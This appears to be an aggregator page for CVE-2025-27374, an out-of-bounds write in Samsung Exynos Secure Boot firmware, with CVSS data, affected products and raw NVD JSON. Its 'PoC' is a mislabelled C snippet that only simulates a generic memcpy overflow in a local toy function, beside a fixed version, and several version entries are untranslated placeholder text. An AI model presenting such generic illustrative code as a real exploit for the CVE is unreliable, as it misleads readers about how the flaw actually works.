CVE-2025-27374

Description

An issue was discovered in the Secure Boot component in Samsung Mobile Processor and Wearable Processor Exynos 9820, 9825, 980, 990, 850, 1080, 1280, 2200, 1330, 1380, 1480, 2400. The lack of a length check leads to out-of-bounds writes.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_9825_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_9825:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_9820_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_9820:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_2400_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_2400:-:*:*:*:*:*:*:* - NOT VULNERABLE

Samsung Exynos 9820 < 安全补丁版本

Samsung Exynos 9825 < 安全补丁版本

Samsung Exynos 980 < 安全补丁版本

Samsung Exynos 990 < 安全补丁版本

Samsung Exynos 850 < 安全补丁版本

Samsung Exynos 1080 < 安全补丁版本

Samsung Exynos 1280 < 安全补丁版本

Samsung Exynos 2200 < 安全补丁版本

Samsung Exynos 1330 < 安全补丁版本

Samsung Exynos 1380 < 安全补丁版本

Samsung Exynos 1480 < 安全补丁版本

Samsung Exynos 2400 < 安全补丁版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-27374 PoC - Secure Boot Length Check Bypass
// This PoC demonstrates the concept of the vulnerability

#include <stdio.h>
#include <stdint.h>
#include <string.h>

// Simulated Secure Boot header structure
typedef struct {
    uint32_t magic;
    uint32_t image_size;
    uint32_t load_address;
    uint32_t entry_point;
    uint8_t signature[256];
    uint8_t* image_data;
} secure_boot_header_t;

// Vulnerable function - missing length check
void load_secure_image(secure_boot_header_t* header) {
    uint8_t buffer[1024];
    
    // VULNERABILITY: Missing boundary check on image_size
    // Should check: if (header->image_size > sizeof(buffer))
    
    memcpy(buffer, header->image_data, header->image_size);
    // If image_size > 1024, this causes OOB write
}

// Secure version with proper validation
void load_secure_image_fixed(secure_boot_header_t* header) {
    uint8_t buffer[1024];
    
    // FIX: Proper length check before copy
    if (header->image_size > sizeof(buffer)) {
        printf("[-] Error: Image size exceeds buffer boundary\n");
        return;
    }
    
    memcpy(buffer, header->image_data, header->image_size);
    printf("[+] Secure image loaded successfully\n");
}

// Exploit demonstration
int main() {
    printf("[*] CVE-2025-27374 PoC - Secure Boot OOB Write\n");
    
    // Create malicious header with oversized image_size
    secure_boot_header_t malicious_header;
    malicious_header.magic = 0xDEADBEEF;
    malicious_header.image_size = 2048;  // Exceeds buffer size (1024)
    malicious_header.load_address = 0x10000;
    malicious_header.entry_point = 0x10000;
    
    // Allocate oversized data
    malicious_header.image_data = (uint8_t*)malloc(2048);
    memset(malicious_header.image_data, 0x41, 2048);
    
    printf("[*] Triggering vulnerable load function...\n");
    load_secure_image(&malicious_header);  // OOB write occurs
    
    printf("[+] PoC demonstrates buffer overflow in Secure Boot\n");
    printf("[*] Mitigation: Apply Samsung security update\n");
    
    free(malicious_header.image_data);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27374
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27374
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27374/
[4] VulDB https://vuldb.com/cve/CVE-2025-27374
[5] https://semiconductor.samsung.com/support/quality-support/product-security-updates/
[6] https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-27374/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27374", "sourceIdentifier": "[email protected]", "published": "2025-11-04T21:15:36.523", "lastModified": "2025-11-07T13:00:04.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in the Secure Boot component in Samsung Mobile Processor and Wearable Processor Exynos 9820, 9825, 980, 990, 850, 1080, 1280, 2200, 1330, 1380, 1480, 2400. The lack of a length check leads to out-of-bounds writes."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_9825_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "7584E423-2C8E-4576-AB84-BC3A8351B3F9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_9825:-:*:*:*:*:*:*:*", "matchCriteriaId": "77A6027E-CD79-4DBD-B065-BE5AE7967F3B"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_9820_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E582F31-BCC1-4276-BC34-A38EDCC4BB01"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_9820:-:*:*:*:*:*:*:*", "matchCriteriaId": "1B8C35DE-1C58-4C6E-BB15-0E3C2FECB8DA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F18F62E-2012-442E-BE60-6E76325D1824"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D8701B6-6989-44D1-873A-A1823BFD7CCC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1928760C-4FC4-45B0-84FF-C1105CD1DD2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB410A6D-642B-49AE-8B1C-EADA953A84DA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2400_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "16D9272E-1794-48FF-B6A4-8F48395BA38E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2400:-:*:*:*:*:*:*:*", "matchCriteriaId": "932F5FB3-5527-44D7-9DD9-EF03963E3CA3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "64897B0D-EBF6-4BEB-BF54-ABCDBFAB45E0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3F328B4-0442-4748-B5EE-DD1CEE50D6CF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D381478B-C638-4663-BD71-144BE4B02E46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:*", "matchCriteriaId": "61E72146-72FE-4B54-AB79-3C665E7F016C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2635646-DD6A-4735-8E01-F45445584832"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA0F8A58-71B7-4503-A03A-6FB4282D75BD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "63C0D9AC-BD23-48C9-83E7-301DEC06E583"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "A72ADEBB-ED72-4A5B-BB27-95EDE43F8116"}]}]} ... (truncated)